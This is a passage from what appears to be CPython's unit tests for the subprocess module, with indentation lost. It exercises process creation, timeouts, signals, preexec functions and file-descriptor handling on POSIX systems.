stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
